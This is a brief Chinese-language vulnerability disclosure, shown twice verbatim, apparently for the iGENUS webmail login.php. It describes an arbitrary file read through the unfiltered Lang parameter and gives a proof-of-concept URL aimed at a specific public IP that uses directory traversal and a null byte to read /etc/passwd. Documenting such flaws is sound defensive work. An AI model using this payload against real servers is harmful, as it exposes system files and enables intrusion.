login.php 文件中,选择语言环境后会读取语言文件,并加载到页面,后台接到请求后,没有对 Lang 参数过滤,就直接读取文件,从而造成任意文件读取漏洞。 ``` http://221.130.182.230/igenus/login.php?Lang=../../../../../../../../../../etc/passwd%00.jpg ```
login.php 文件中,选择语言环境后会读取语言文件,并加载到页面,后台接到请求后,没有对 Lang 参数过滤,就直接读取文件,从而造成任意文件读取漏洞。 ``` http://221.130.182.230/igenus/login.php?Lang=../../../../../../../../../../etc/passwd%00.jpg ```